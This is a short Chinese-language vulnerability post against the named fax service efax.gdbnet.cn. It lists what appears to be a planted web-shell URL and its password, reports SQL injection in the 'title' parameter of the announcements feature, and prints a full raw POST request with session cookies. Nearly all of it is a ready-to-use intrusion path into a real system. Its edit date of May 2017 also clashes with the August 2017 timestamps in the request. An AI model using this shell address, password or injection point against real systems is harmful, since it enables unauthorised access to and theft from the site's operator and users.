编辑: 我不是阿L | 2017-05-25 |
gdbnet.cn/upload/201708/02080720390201708071506442181.jsp 密码13l4l0ve sql注入 存在大量注入,举例一处 在高级设置-公告消息的地方,参数title存在注入 POST /GDbnetfaxC/messageAction.do?action=listEX HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */* Referer: http://efax.gdbnet.cn/GDbnetfaxC/messageAction.do?action=listEX Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible;
MSIE 7.0;
Windows NT 5.1;
Trident/4.0;
.NET CLR 2.0.50727;
.NET4.0C;
.NET4.0E;
.NET CLR 3.0.04506.30;
.NET CLR 3.0.04506.648;
.NET CLR 3.5.21022) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: efax.gdbnet.cn Content-Length:
26 Pragma: no-cache Cookie: JSESSIONID=F71DD3D4E45F761713182DBB9ED78228;
__utma=168990718.1882697417.1502069520.1502069520.1502069520.1;
__utmc=168990718;
__utmz=168990718.1502069520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
Hm_lvt_fb2357ae728031f73d3586dd7edd4007=1502072307,1502086502;
Hm_lpvt_fb2357ae728031f73d3586dd7edd4007=1502086982;
__utma=167241322.1824616098.1502072305.1502072305.1502084446.2;
__utmb=167241322.31.10.1502084446;
__utmc=167241322;
__utmz=167241322.1502072305.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
JSESSIONID=DD8B3D8AECAE4EE53DC7B84C18B1B360 Connection: close title=&starttime=&endtime=